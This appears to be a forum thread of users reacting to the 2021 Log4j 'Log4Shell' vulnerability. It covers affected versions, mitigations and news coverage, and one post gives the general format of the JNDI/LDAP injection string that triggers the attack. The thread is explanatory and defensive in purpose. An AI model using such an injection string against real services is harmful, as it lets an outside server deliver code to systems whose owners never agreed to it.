Worst vulnerability in the last 10 years!

This looks nasty! Watch your servers.

1 Like

Or don’t connect your server to the outside world…

1 Like
1 Like

I am puzzled. A whole page of words yet there is no information given (journalism at it’s finest). :thinking:
So far I’ve got “do not have minecraft server on your production server (unles you patch it)”. :face_with_raised_eyebrow:

5 Likes

https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/

If I had to run windows at home, Malwarebytes would be the only program I would run :rofl:

lol.

Java on a Server? Serious? Never!

1 Like

every service that uses log4j can be attacked. It does not have to be internet-facing, because the attack can be carried to internal systems via payload.
log4j versions 2.0-beta9 to 2.14.1 are vulnerable, although log4j 2.10 or higher can be “hardened” against the attack with setting log4j2.formatMsgNoLookups to true or by removing the JndiLookup class. Log4j 2.15 is the first fixed version.

Several hosters already said that they see internetwide scans for vulnerable services, most likely by attackers scanning for possible targets.

Here is an attempt by someone to list vulnerable services: https://github.com/YfryTchsGD/Log4jAttackSurface
Basically, everyone seems to be vulnerable.

Edit: Apparently, hackers only need to send a string in the format $JNDI:LDAP://SERVER/EXP to a vulnerable service to launch the attack.

2 Likes

LOL at the global mass scanning this has triggered.

So many l33t hax0rs / bad actors / nation states putting together lists of vulnerable services / organizations for potential future exploitation.

You can bet randsomeware is being tweaked to use this CVE as a delivery mechanism too.

Only specific versions of log4j are vulnerable, small silver lining, but good luck opsec people trying to untangle this mess.

It’s the Guardian, what do you expect? Useful information? Truth? Integrity? Any standards at all? :rofl:

It’s not even journalism, it’s just tittle-tattle.

3 Likes

Update on the BBC.

1 Like

The “flagship” payment system used by my country’s government offices, to make huge payments daily runs using Java Applets and hence needs Internet Explorer to run. There have been news about high school drop outs hacking the thing, but rewriting the application seems more expensive to the government than spending to catch these kids and dealing with losses there.

Technology is really amazing, isn’t it :slightly_smiling_face:

1 Like

Well, rest assured, our purple little universe is far, far away from this issue. No Java on our server, only in my coffee mug :crazy_face:

6 Likes